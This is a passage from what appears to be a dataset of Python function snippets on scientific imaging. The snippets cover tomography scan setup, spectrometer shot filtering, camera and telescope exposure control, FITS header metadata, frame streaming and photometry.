dataFormat = LocalProperties.get(\"gda.data.scan.datawriter.dataFormat\")\n try:\n darkFieldInterval = int(darkFieldInterval)\n flatFieldInterval = int(flatFieldInterval)\n optimizeBeamInterval = int(optimizeBeamInterval)\n \n image_key_frame = 3\n nframes = int(nframes)\n if nframes < 1:\n nframes = 1\n \n jns = beamline_parameters.JythonNameSpaceMapping(InterfaceProvider.getJythonNamespace())\n tomography_theta = jns.tomography_theta\n if tomography_theta is None:\n raise NameError(\"tomography_theta is not defined in Jython namespace\")\n tomography_shutter = jns.tomography_shutter\n if tomography_shutter is None:\n raise NameError(\"tomography_shutter is not defined in Jython namespace\")\n tomography_translation = jns.tomography_translation\n if tomography_translation is None:\n raise NameError(\"tomography_translation is not defined in Jython namespace\")\n \n tomography_detector = jns.tomography_detector\n if tomography_detector is None:\n raise NameError(\"tomography_detector is not defined in Jython namespace\")\n\n tomography_optimizer = jns.tomography_optimizer\n if tomography_optimizer is None:\n raise NameError(\"tomography_optimizer is not defined in Jython namespace\")\n\n tomography_time = jns.tomography_time\n if tomography_time is None:\n raise NameError(\"tomography_time is not defined in Jython namespace\")\n \n tomography_beammonitor = jns.tomography_beammonitor\n if tomography_beammonitor is None:\n raise NameError(\"tomography_beammonitor is not defined in Jython namespace\")\n \n tomography_camera_stage = jns.tomography_camera_stage\n if tomography_camera_stage is None:\n raise NameError(\"tomography_camera_stage is not defined in Jython namespace\")\n \n tomography_sample_stage = jns.tomography_sample_stage\n if tomography_sample_stage is None:\n raise NameError(\"tomography_sample_stage is not defined in Jython namespace\")\n \n tomo_additional_scannables = jns.tomography_additional_scannables\n if tomo_additional_scannables is None:\n raise NameError(\"tomo_additional_scannables is not defined in Jython namespace\")\n \n index = SimpleScannable()\n index.setCurrentPosition(0.0)\n index.setInputNames([\"imageNumber\"])\n index.setName(\"imageNumber\")\n index.configure()\n \n image_key = SimpleScannable()\n image_key.setCurrentPosition(0.0)\n image_key.setInputNames([\"image_key\"])\n image_key.setName(\"image_key\")\n image_key.configure()\n\n tomoScanDevice = make_tomoScanDevice(tomography_theta, tomography_shutter,\n tomography_translation, tomography_optimizer, image_key, index)\n\n# return tomoScanDevice\n #generate list of positions\n numberSteps = ScannableUtils.getNumberSteps(tomography_theta, start, stop, step)\n theta_points = []\n theta_points.append(start)\n previousPoint = start\n for i in range(numberSteps):\n nextPoint = ScannableUtils.calculateNextPoint(previousPoint, step);\n theta_points.append(nextPoint)\n previousPoint = nextPoint\n \n #generateScanPoints\n optimizeBeamNo = 0\n optimizeBeamYes = 1\n shutterOpen = 1\n shutterClosed = 0\n shutterNoChange = 2\n scan_points = []\n theta_pos = theta_points[0]\n index = 0\n #Added shutterNoChange state for the shutter. The scan points are added using the (pseudo) ternary operator, \n #if index is 0 then the shutterPosition is added to the scan point, else shutterNoChange is added to scan points.\n for i in range(imagesPerDark):\n scan_points.append((theta_pos, [shutterClosed, shutterNoChange][i != 0], inBeamPosition, optimizeBeamNo, image_key_dark, index)) #dark\n index = index + 1\n \n for i in range(imagesPerFlat): \n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], outOfBeamPosition, optimizeBeamNo, image_key_flat, index)) #flat\n index = index + 1\n for frm in range(nframes): \n scan_points.append((theta_pos, shutterOpen, inBeamPosition, optimizeBeamNo, image_key_project if frm==0 else image_key_frame, index)) #first\n index = index + 1 \n imageSinceDark = 1\n imageSinceFlat = 1\n optimizeBeam = 0\n for i in range(numberSteps):\n theta_pos = theta_points[i + 1]\n for frm in range(nframes):\n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], inBeamPosition, optimizeBeamNo, image_key_project if frm==0 else image_key_frame, index))#main image\n index = index + 1 \n \n imageSinceFlat = imageSinceFlat + 1\n if imageSinceFlat == flatFieldInterval and flatFieldInterval != 0:\n for i in range(imagesPerFlat):\n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], outOfBeamPosition, optimizeBeamNo, image_key_flat, index))\n index = index + 1 \n imageSinceFlat = 0\n \n imageSinceDark = imageSinceDark + 1\n if imageSinceDark == darkFieldInterval and darkFieldInterval != 0:\n for i in range(imagesPerDark):\n scan_points.append((theta_pos, [shutterClosed, shutterNoChange][i != 0], inBeamPosition, optimizeBeamNo, image_key_dark, index))\n index = index + 1 \n imageSinceDark = 0\n\n optimizeBeam = optimizeBeam + 1\n if optimizeBeam == optimizeBeamInterval and optimizeBeamInterval != 0:\n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], inBeamPosition, optimizeBeamYes, image_key_project, index))\n index = index + 1 \n optimizeBeam = 0\n \n #add dark and flat only if not done in last steps\n if imageSinceFlat != 0:\n for i in range(imagesPerFlat):\n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], outOfBeamPosition, optimizeBeamNo, image_key_flat, index)) #flat\n index = index + 1\n if imageSinceDark != 0:\n for i in range(imagesPerDark):\n scan_points.append((theta_pos, [shutterClosed, shutterNoChange][i != 0], inBeamPosition, optimizeBeamNo, image_key_dark, index)) #dark\n index = index + 1 \n# scan_points1 = generateScanPoints(inBeamPosition, outOfBeamPosition, theta_points, darkFieldInterval, flatFieldInterval,\n# imagesPerDark, imagesPerFlat, optimizeBeamInterval, pattern=pattern)\n# if pattern == 'default' or pattern == 'DFPFD':\n# i = 0\n# for pt1 in scan_points1:\n# pt = scan_points[i]\n# if pt1 != pt:\n# print \"Mismatch - please tell Kaz about your scan and its arguments!\"\n# print \"i = \", i\n# print \"pt = \", pt\n# print \"pt1 = \", pt1\n# i += 1\n #return None\n positionProvider = tomoScan_positions(start, stop, step, darkFieldInterval, imagesPerDark, flatFieldInterval, imagesPerFlat, \\\n inBeamPosition, outOfBeamPosition, optimizeBeamInterval, scan_points) \n scan_args = [tomoScanDevice, positionProvider, tomography_time, tomography_beammonitor, tomography_detector, exposureTime, tomography_camera_stage, tomography_sample_stage]\n #scan_args.append(RotationAxisScannable(\"approxCOR\", tomoRotationAxis))\n #meta_add(RotationAxisScannable(\"approxCOR\", tomoRotationAxis))\n #meta_add(\"RotationCoord_as_list\", [tomoRotationAxis])\n meta_add(\"approxCOR\", tomoRotationAxis)\n for scannable in additionalScannables:\n scan_args.append(scannable)\n for scannable in tomo_additional_scannables:\n scan_args.append(scannable)\n ''' setting the description provided as the title'''\n if not description == None: \n setTitle(description)\n else :\n setTitle(\"undefined\")\n \n dataFormat = LocalProperties.get(\"gda.data.scan.datawriter.dataFormat\")\n if not dataFormat == \"NexusDataWriter\":\n handle_messages.simpleLog(\"Data format inconsistent. Setting 'gda.data.scan.datawriter.dataFormat' to 'NexusDataWriter'\")\n LocalProperties.set(\"gda.data.scan.datawriter.dataFormat\", \"NexusDataWriter\")\n scanObject = createConcurrentScan(scan_args)\n if addNXEntry:\n addNXTomoSubentry(scanObject, tomography_detector.name, tomography_theta.name)\n scanObject.runScan()\n if autoAnalyse:\n lsdp=jns.lastScanDataPoint()\n OSCommandRunner.runNoWait([\"/dls_sw/apps/tomopy/tomopy/bin/gda/tomo_at_scan_end_kz\", lsdp.currentFilename], OSCommandRunner.LOGOPTION.ALWAYS, None)\n return scanObject;\n except InterruptedException:\n exceptionType, exception, traceback = sys.exc_info()\n handle_messages.log(None, \"User interrupted the scan\", exceptionType, exception, traceback, False)\n raise InterruptedException(\"User interrupted the scan\")\n except:\n exceptionType, exception, traceback = sys.exc_info()\n handle_messages.log(None, \"Error during tomography scan\", exceptionType, exception, traceback, False)\n raise Exception(\"Error during tomography scan\", exception)\n finally:\n handle_messages.simpleLog(\"Data Format reset to the original setting: \" + dataFormat)\n LocalProperties.set(\"gda.data.scan.datawriter.dataFormat\", dataFormat)", "def event(self,evt,evn):\n #import pdb; pdb.set_trace()\n if (evt.get(\"skip_event\")):\n return\n # check if FEE data is one or two dimensional\n data = evt.get(Camera.FrameV1, self.src)\n if data is None:\n one_D = True\n data = evt.get(Bld.BldDataSpectrometerV1, self.src)\n else:\n one_D = False\n # get event timestamp\n timestamp = cspad_tbx.evt_timestamp(cspad_tbx.evt_time(evt)) # human readable format\n\n if data is None:\n self.nnodata +=1\n #self.logger.warning(\"event(): No spectrum data\")\n evt.put(skip_event_flag(),\"skip_event\")\n\n if timestamp is None:\n evt.put(skip_event_flag(),\"skip_event\")\n #self.logger.warning(\"event(): No TIMESTAMP, skipping shot\")\n\n elif data is not None:\n self.nshots +=1\n # get data as array and split into two half to find each peak\n if one_D:\n # filtering out outlier spikes in FEE data\n data = np.array(data.hproj().astype(np.float64))\n for i in range(len(data)):\n if data[i]>1000000000:\n data[i]=data[i]-(2**32)\n if self.dark is not None:\n data = data - self.dark\n spectrum = data\n spectrum1 = data[:data.shape[0]//2]\n spectrum2 = data[data.shape[0]//2:]\n else:\n data = np.array(data.data16().astype(np.int32))\n if self.dark is not None:\n data = data - self.dark\n data = np.double(data)\n data_split1 = data[:,:data.shape[1]//2]\n data_split2 = data[:,data.shape[1]//2:]\n # make a 1D trace of entire spectrum and each half to find peaks\n spectrum = np.sum(data,0)/data.shape[0]\n spectrum1 = np.sum(data_split1,0)/data_split1.shape[0]\n spectrum2 = np.sum(data_split2,0)/data_split2.shape[0]\n if not one_D:\n # the x-coordinate of the weighted center of peak region\n weighted_peak_one_positions = []\n for i in range(self.peak_one_range_min,self.peak_one_range_max):\n weighted_peak_one_positions.append(spectrum[i]*i)\n weighted_sum_peak_one = np.sum(weighted_peak_one_positions)\n weighted_peak_one_center_position = weighted_sum_peak_one/np.sum(spectrum[self.peak_one_range_min:self.peak_one_range_max])\n\n weighted_peak_two_positions = []\n for i in range(self.peak_two_range_min,self.peak_two_range_max):\n weighted_peak_two_positions.append(spectrum[i]*i)\n weighted_sum_peak_two = np.sum(weighted_peak_two_positions)\n weighted_peak_two_center_position = weighted_sum_peak_two/np.sum(spectrum[self.peak_two_range_min:self.peak_two_range_max])\n\n # normalized integrated regions between the peaks\n #int_left_region = np.sum(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n int_left_region = np.sum(spectrum[:weighted_peak_two_center_position/2])\n\n #int_left_region_norm = np.sum(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])/len(spectrum[weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2:(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n int_left_region_norm = np.sum(spectrum[:weighted_peak_two_center_position/2])/len(spectrum[:weighted_peak_two_center_position/2])\n\n int_right_region = np.sum(spectrum[self.peak_two_range_max:])\n\n int_right_region_norm = np.sum(spectrum[self.peak_two_range_max:])/len(spectrum[self.peak_two_range_max:])\n\n # normalized integrated peaks\n int_peak_one = np.sum(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])\n\n int_peak_one_norm = np.sum(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])/len(spectrum[(weighted_peak_one_center_position-len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2):(weighted_peak_one_center_position+len(spectrum[self.peak_one_range_min:self.peak_one_range_max])/2)])\n\n int_peak_two = np.sum(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n\n int_peak_two_norm = np.sum(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])/len(spectrum[(weighted_peak_two_center_position-len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2):(weighted_peak_two_center_position+len(spectrum[self.peak_two_range_min:self.peak_two_range_max])/2)])\n\n if not one_D:\n if int_peak_one_norm/int_peak_two_norm > self.peak_ratio:\n print(\"event(): inflection peak too high\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n if int_left_region_norm > self.normalized_peak_to_noise_ratio*int_peak_two_norm:\n print(\"event(): noisy left of low energy peak\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n if int_right_region_norm > self.normalized_peak_to_noise_ratio*int_peak_two_norm:\n print(\"event(): noisy right of high energy peak\")\n evt.put(skip_event_flag(), \"skip_event\")\n return\n #self.logger.info(\"TIMESTAMP %s accepted\" %timestamp)\n self.naccepted += 1\n self.ntwo_color += 1\n print(\"%d Remote shot\" %self.ntwo_color)\n print(\"%s Remote timestamp\" %timestamp)", "def changeExposure(cam=0, increment=None, value=None):\n try:\n if increment is not None:\n exposure = commands.getoutput(\"v4l2-ctl -d {} --get-ctrl exposure_absolute\".format(cam)).split()[1]\n exposure = int(exposure)\n exposure = max(0, exposure + increment)\n elif value is not None:\n exposure = max(0, value)\n else:\n raise Exception(\"increment or value must be an integer\")\n commands.getoutput(\"v4l2-ctl -d {} --set-ctrl exposure_absolute={}\".format(cam, exposure))\n print \"Exposure {}\".format(exposure)\n except Exception as e:\n print \"Failed to change exposure: {}\".format(e)", "def tune_exposure_time(camera, target, initial_exptime, min_exptime=0, max_exptime=None,\n max_steps=5, tolerance=0.1, cutout_size=256, bias=None, **kwargs):\n camera.logger.info(f\"Tuning exposure time for {camera}.\")\n\n images_dir = camera.get_config(\"directories.images\", None)\n if images_dir:\n images_dir = os.path.join(images_dir, \"temp\")\n os.makedirs(images_dir, exist_ok=True)\n\n # Parse quantities\n initial_exptime = get_quantity_value(initial_exptime, \"second\") * u.second\n\n if min_exptime is not None:\n min_exptime = get_quantity_value(min_exptime, \"second\") * u.second\n if max_exptime is not None:\n max_exptime = get_quantity_value(max_exptime, \"second\") * u.second\n\n try:\n bit_depth = camera.bit_depth.to_value(\"bit\")\n except NotImplementedError:\n bit_depth = 16\n\n saturated_counts = 2 ** bit_depth\n\n prefix = images_dir if images_dir is None else images_dir + \"/\"\n with tempfile.NamedTemporaryFile(suffix=\".fits\", prefix=prefix, delete=False) as tf:\n\n exptime = initial_exptime\n\n for step in range(max_steps):\n\n # Check if exposure time is within valid range\n if (exptime == max_exptime) or (exptime == min_exptime):\n break\n\n # Get an image\n cutout = camera.get_cutout(exptime, tf.name, cutout_size, keep_file=False, **kwargs)\n cutout = cutout.astype(\"float32\")\n if bias is not None:\n cutout -= bias\n\n # Measure average counts\n normalised_counts = np.median(cutout) / saturated_counts\n\n camera.logger.debug(f\"Normalised counts for {exptime} exposure on {camera}:\"\n f\" {normalised_counts}\")\n\n # Check if tolerance condition is met\n if tolerance:\n if abs(normalised_counts - target) < tolerance:\n break\n\n # Update exposure time\n exptime = exptime * target / normalised_counts\n if max_exptime is not None:\n exptime = min(exptime, max_exptime)\n if min_exptime is not None:\n exptime = max(exptime, min_exptime)\n\n camera.logger.info(f\"Tuned exposure time for {camera}: {exptime}\")\n\n return exptime", "def update_exposure_v1(self, skill_id, experiment_id, update_exposure_request, **kwargs):\n # type: (str, str, UpdateExposureRequest_ce52ce53, **Any) -> Union[ApiResponse, object, StandardizedError_f5106a89, BadRequestError_f854b05]\n operation_name = \"update_exposure_v1\"\n params = locals()\n for key, val in six.iteritems(params['kwargs']):\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'skill_id' is set\n if ('skill_id' not in params) or (params['skill_id'] is None):\n raise ValueError(\n \"Missing the required parameter `skill_id` when calling `\" + operation_name + \"`\")\n # verify the required parameter 'experiment_id' is set\n if ('experiment_id' not in params) or (params['experiment_id'] is None):\n raise ValueError(\n \"Missing the required parameter `experiment_id` when calling `\" + operation_name + \"`\")\n # verify the required parameter 'update_exposure_request' is set\n if ('update_exposure_request' not in params) or (params['update_exposure_request'] is None):\n raise ValueError(\n \"Missing the required parameter `update_exposure_request` when calling `\" + operation_name + \"`\")\n\n resource_path = '/v1/skills/{skillId}/experiments/{experimentId}/exposurePercentage'\n resource_path = resource_path.replace('{format}', 'json')\n\n path_params = {} # type: Dict\n if 'skill_id' in params:\n path_params['skillId'] = params['skill_id']\n if 'experiment_id' in params:\n path_params['experimentId'] = params['experiment_id']\n\n query_params = [] # type: List\n\n header_params = [] # type: List\n\n body_params = None\n if 'update_exposure_request' in params:\n body_params = params['update_exposure_request']\n header_params.append(('Content-type', 'application/json'))\n header_params.append(('User-Agent', self.user_agent))\n\n # Response Type\n full_response = False\n if 'full_response' in params:\n full_response = params['full_response']\n\n # Authentication setting\n access_token = self._lwa_service_client.get_access_token_from_refresh_token()\n authorization_value = \"Bearer \" + access_token\n header_params.append(('Authorization', authorization_value))\n\n error_definitions = [] # type: List\n error_definitions.append(ServiceClientResponse(response_type=None, status_code=204, message=\"Success. No content.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.bad_request_error.BadRequestError\", status_code=400, message=\"Server cannot process the request due to a client error.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=401, message=\"The auth token is invalid/expired or doesn&#39;t have access to the resource.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.bad_request_error.BadRequestError\", status_code=403, message=\"The operation being requested is not allowed.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=404, message=\"The resource being requested is not found.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=409, message=\"The request could not be completed due to a conflict with the current state of the target resource.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=429, message=\"Exceeds the permitted request limit. Throttling criteria includes total requests, per API, ClientId, and CustomerId.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=500, message=\"Internal Server Error.\"))\n error_definitions.append(ServiceClientResponse(response_type=\"ask_smapi_model.v1.skill.standardized_error.StandardizedError\", status_code=503, message=\"Service Unavailable.\"))\n\n api_response = self.invoke(\n method=\"POST\",\n endpoint=self._api_endpoint,\n path=resource_path,\n path_params=path_params,\n query_params=query_params,\n header_params=header_params,\n body=body_params,\n response_definitions=error_definitions,\n response_type=None)\n\n if full_response:\n return api_response\n \n return None", "def metadata(filename, header=fits.PrimaryHDU().header, clear=True):\n\n if clear:\n header.clear()\n\n header.append(('comment', ''), end=True)\n header.append(('comment', '*'*60), end=True)\n header.append(('comment', '*'*18 + ' Time and Pointing Data ' + '*'*18), end=True)\n header.append(('comment', '*'*60), end=True)\n header.append(('comment', ''), end=True)\n\n try:\n origname = re.sub('.*CRSA', '', re.sub('.fits', '', filename))\n header.append(('origname', origname, 'Original file ID number'), end=True)\n except:\n pass\n\n ####################################################################\n # Attempt to get the mean time of the exposure. Try three things:\n # 1. The mean of mjd-str and mjd-end in the main header (HDU 0)\n # 2. mjd in the main header (HDU 0)\n # 3. The mean acquisition time in the headers of the individual \n # reads, computed as acqtime in HDU 1 plus 1.48s/2*nreads\n ####################################################################\n\n mjd_ok = True\n try:\n head = fits.open(filename)[0].header\n try:\n mean_mjd = 0.5*(head['mjd-str'] + head['mjd-end'])\n except:\n try:\n mean_mjd = head['mjd'] + 1.48*0.5*len(fits.open(filename))/86400\n except:\n ########################################################\n # Note: acqtime is unreliable--doesn't always update.\n ########################################################\n #head1 = fits.open(filename)[1].header\n #mean_mjd = head1['acqtime'] - 2400000.5\n #mean_mjd += 1.48*0.5*len(fits.open(filename))/86400\n ########################################################\n # This is pretty bad: use the checksum time of the\n # middle read as the time stamp of last resort.\n ########################################################\n head1 = fits.open(filename)[len(fits.open(filename))//2].header\n t = head1.comments['checksum'].split()[-1]\n t = Time(t, format='isot')\n t.format = 'mjd'\n mean_mjd = float(str(t)) \n except:\n mjd_ok = False\n mean_mjd = np.nan\n utc_date = 'unavailable'\n utc_time = 'unavailable'\n\n pos_ok = True\n\n ####################################################################\n # Need RA and Dec to compute parallactic angle\n ####################################################################\n\n try:\n head = fits.open(filename)[0].header\n ra, dec = [head['ra'], head['dec']]\n except:\n #ra, dec = ['05:02:27.5438', '+07:27:39.265']\n \t#ra, dec = ['04:37:36.182', '-02:28:25.87']\n pos_ok = False\n \n if mjd_ok:\n\n ################################################################\n # Subaru's coordinates in degrees\n ################################################################\n \n lng, lat = [-155.4760187, 19.825504]\n subaru = (str(lng) + 'd', str(lat) + 'd')\n t = Time(mean_mjd, format='mjd', location=subaru)\n \n if pos_ok:\n\n ############################################################\n # Precess from J2000 to the appropriate epoch\n ############################################################\n\n c = coord.SkyCoord(ra=ra, dec=dec, unit=(u.hourangle, u.deg), frame='fk5')\n \n equinox = 'J%.5f' %(2000 + (mean_mjd - 51544.5)/365.25)\n c = c.transform_to(coord.FK5(equinox=equinox))\n\n ################################################################\n # Compute hour angle to get parallactic angle\n ################################################################\n\n ha = (t.sidereal_time('apparent') - c.ra).rad\n lat = lat*np.pi/180\n \n pa = -np.arctan2(-np.sin(ha), np.cos(c.dec.rad)*np.tan(lat)\n - np.sin(c.dec.rad)*np.cos(ha))\n pa = float(pa%(2*np.pi))\n else:\n pa = np.nan\n\n t.format = 'isot'\n utc_date = str(t).split('T')[0]\n utc_time = str(t).split('T')[1]\n else:\n pa = np.nan\n\n if not np.isfinite(mean_mjd):\n mean_mjd = utc_date = utc_time = 'unavailable'\n\n header['mjd'] = (mean_mjd, 'Mean MJD of exposure') \n header['utc-date'] = (utc_date, 'UTC date of exposure') \n header['utc-time'] = (utc_time, 'Mean UTC time of exposure')\n\n ####################################################################\n # Attempt to fetch useful/important keywords from the original\n # file's FITS header\n ####################################################################\n\n header.append(_fetch('ra', filename, comment='RA of telescope pointing'))\n header.append(_fetch('dec', filename, comment='DEC of telescope pointing'))\n\n if np.isfinite(pa):\n header['parang'] = (pa*180/np.pi, 'Mean parallactic angle (degrees)')\n else:\n header['parang'] = ('unavailable', 'Mean parallactic angle (degrees)')\n header.append(_fetch('d_imrpap', filename, comment='Image rotator pupil position angle (degrees)'))\n\n header.append(_fetch('HIERARCH CHARIS.FILTER.NAME', filename, \n comment='CHARIS filter name', newkey='filtname'))\n header.append(_fetch('HIERARCH CHARIS.FILTER.SLOT', filename, \n comment='CHARIS filter slot', newkey='filtpos'))\n header.append(_fetch('HIERARCH CHARIS.SHUTTER', filename, \n comment='CHARIS shutter position', newkey='shutter'))\n\n return header", "def exposure(self):\n\n # define a range of declination to evaluate the\n # exposure at\n self.declination = np.linspace(-np.pi/2, np.pi/2, self.num_points)\n\n m = np.asarray([m_dec(d, self.params) for d in self.declination])\n \n # normalise to a maximum at 1\n self.exposure_factor = (m / m_dec(-np.pi/2, self.params))\n\n # find the point at which the exposure factor is 0\n self.limiting_dec = Angle((self.declination[m == 0])[0], 'rad')", "def _do_expose_loop(self, fitsfile, seconds):\n log.debug(f\"Starting expose loop with {self.max_exposures} exposures\")\n while (self.current_exposure is not None and \n self.current_exposure < self.max_exposures):\n self.current_exposure += 1\n self.Expose(fitsfile, seconds)\n while self.process and self.process.poll() is None:\n sleep(5)\n if not self.process or self.process.returncode != 0:\n break\n \n self.current_exposure = None\n self.max_exposures = None", "def request():\n return face_client.face.detect_with_stream(image=open(\"frame.png\", 'rb'),\n return_face_attributes=[emotion_attribute],\n recognition_model='recognition_02')", "def __init__(self, exposure = -1):\n self.cam = None\n self.exposure = exposure\n\n self._set_camera()", "def run_observation(self):\n\n self._generate_direct_image() # to calibrate x_ref and y_ref\n\n num_frames = len(self.exp_start_times)\n progress = Progress(num_frames)\n self.progess = progress\n\n progress_line = 'Generating frames 0/{} done'.format(num_frames)\n progress.print_status_line(progress_line)\n progress.progress_line = progress_line\n\n for i, start_time in enumerate(self.exp_start_times):\n filenum = i + 1\n self._generate_exposure(start_time, filenum)\n\n progress.increment()\n progress_line = 'Generating frames {}/{} done'.format(filenum,\n num_frames)\n progress.print_status_line(progress_line)\n\n # so it can be retreived by exposure_generator\n progress.progress_line = progress_line", "def get_data(self):\n global CAM\n while CAM.isOpened():\n _, frame = CAM.read()\n _, jpeg = cv2.imencode('.jpg', frame)\n encoded_img = \"data:image/jpg;base64,\" + str(base64.b64encode(jpeg.tobytes()).decode())\n SIO.emit('video_frame',\n {'frame': encoded_img},\n namespace='/live-stream')\n sleep(self.delay)", "def exposure():\n def r(x):\n return x/6e4\n\n def w(x):\n return int(x*6e4)\n return r, w", "def send_frame(self):\n frame = self.frame_buffer.get()\n result, jpeg = cv2.imencode(\".jpg\", frame.nparray)#, self.encode_param)\n data = numpy.array(jpeg)\n string_data = data.tostring()\n self.sock.send(str(len(string_data)).ljust(16))\n self.sock.send(string_data)", "def execute_experiment(\n self,\n capture_settings=None,\n file_path=None,\n position_list=None,\n interactive=False,\n ):\n hardware_components.log_method(self, \"execute_experiment\")\n # call execute_experiment method in ConnectMicroscope instance.\n # This instance will be based on a microscope specific connect module.\n timeStart = datetime.datetime.now()\n\n communication_object = self._get_control_software().connection\n try:\n if position_list is None:\n service_response = communication_object.snap_image(capture_settings)\n else:\n service_response = communication_object.execute_experiment(\n capture_settings, position_list\n )\n self.last_experiment = capture_settings\n except AutomationError as error:\n self.recover_hardware(error)\n\n timeEnd = datetime.datetime.now()\n\n image = ImageAICS(meta={\"aics_Experiment\": capture_settings})\n # image.add_meta(self.settings)\n\n # add meta data about acquisition time\n timeDuration = (timeEnd - timeStart).total_seconds()\n image.add_meta(service_response)\n image.add_meta(\n {\n \"aics_dateStartShort\": timeStart.strftime(\"%Y%m%d\"),\n \"aics_dateEndShort\": timeEnd.strftime(\"%Y%m%d\"),\n \"aics_dateStart\": timeStart.strftime(\"%m/%d/%Y\"),\n \"aics_dateEnd\": timeEnd.strftime(\"%m/%d/%Y\"),\n \"aics_timeStart\": timeStart.strftime(\"%H:%M:%S\"),\n \"aics_timeEnd\": timeEnd.strftime(\"%H:%M:%S\"),\n \"aics_timeDuration\": timeDuration,\n }\n )\n # save image\n if file_path:\n image = self.save_image(file_path, image, interactive=interactive)\n return image", "def query_and_read_frame(frame_type, channels, start_time, end_time):\n logging.info('querying datafind server')\n paths = frame_paths(frame_type, start_time, end_time)\n logging.info('found files: %s' % (' '.join(paths)))\n return read_frame(paths, channels, \n start_time=start_time, \n end_time=end_time)", "def insert_exposure(\n self, expid, night, telra=None, teldec=None,\n tile=None, dateobs=None, flavor=None, exptime=None\n ):\n\n # Check if expid is already registered\n if not Exposure.objects.filter(exposure_id=expid):\n exposure = Exposure(\n exposure_id=expid, night=night,\n telra=telra, teldec=teldec,\n tile=tile, dateobs=dateobs,\n flavor=flavor, exptime=exptime\n )\n exposure.save()\n\n # Save Process for this exposure\n return Exposure.objects.get(exposure_id=expid)", "def photometry(self, ctr1, ctr2):\n if not self.HAS_PIPECAL:\n log.warning('Photometry is not available. The '\n 'sofia_redux.calibration package is required.')\n return\n\n # reset photometry table if necessary\n if self.ptable is None:\n self.reset_ptable()\n\n # get photometry parameters\n param = self.phot_parameters\n\n # check for the current status of the viewer\n # (tiling, aligned by wcs)\n if self.run('tile', via='get') == 'yes':\n allframes = True\n frames = self.run('frame active', via='get').split()\n else:\n allframes = False\n frames = [self.run('frame', via='get')]\n if self.run('wcs align', via='get') == 'yes':\n cs = 'wcs'\n else:\n cs = 'image'\n\n # log input values\n log.info(f'Photometry at x={ctr1}, y={ctr2} (in {cs} coordinates)')\n log.info('Parameters:')\n log.info(f\" Model: {param['model']}\")\n log.info(f\" Window: {param['window']} {param['window_units']}\")\n log.info(f\" Starting FWHM: {param['fwhm']} {param['fwhm_units']}\")\n log.info(f\" Aperture: {param['psf_radius']} \"\n f\"{param['aperture_units']}\")\n log.info(f\" Background: radius {param['bg_inner']} \"\n f\"{param['aperture_units']}, width {param['bg_width']} \"\n f\"{param['aperture_units']}\")\n log.info('')\n\n for frame in frames:\n if allframes:\n log.debug('Selecting frame ' + frame)\n self.run('frame ' + frame)\n\n try:\n results = self.retrieve_data(ctr1, ctr2)\n except (ValueError, TypeError) as err:\n log.debug(f'Error in retrieving Frame {frame} data: {err}')\n continue\n ps = results['pix_scale']\n data = results['data']\n fulldata = results['fulldata']\n hwcs = results['wcs']\n wdw = results['window']\n xstart = results['xstart']\n ystart = results['ystart']\n xctr = results['xctr']\n yctr = results['yctr']\n filename = results['filename']\n\n log.info(f'Frame {frame}: {filename}')\n\n # check for reasonable data\n if np.sum(np.isfinite(data)) < 3:\n continue\n\n default_fwhm = param['fwhm']\n if param['fwhm_units'] == 'arcsec':\n default_fwhm /= ps\n try:\n psfr = float(param['psf_radius'])\n if param['aperture_units'] == 'arcsec':\n psfr /= ps\n except ValueError:\n # auto radius\n psfr = 2.15 * default_fwhm\n\n if (param['bg_inner'] is None\n or param['bg_width'] is None):\n do_bg = False\n skyrad = (0., 0.)\n else:\n do_bg = True\n try:\n bgrin = float(param['bg_inner'])\n if param['aperture_units'] == 'arcsec':\n bgrin /= ps\n except ValueError:\n bgrin = psfr + 0.2 * default_fwhm\n try:\n bgwid = float(param['bg_width'])\n if param['aperture_units'] == 'arcsec':\n bgwid /= ps\n bgrout = bgrin + bgwid\n except ValueError:\n bgrout = bgrin + 2.0 * default_fwhm\n\n if bgrout > bgrin:\n skyrad = (bgrin, bgrout)\n else:\n skyrad = (0., 0.)\n\n try:\n phot_par = pipecal_photometry(\n fulldata, 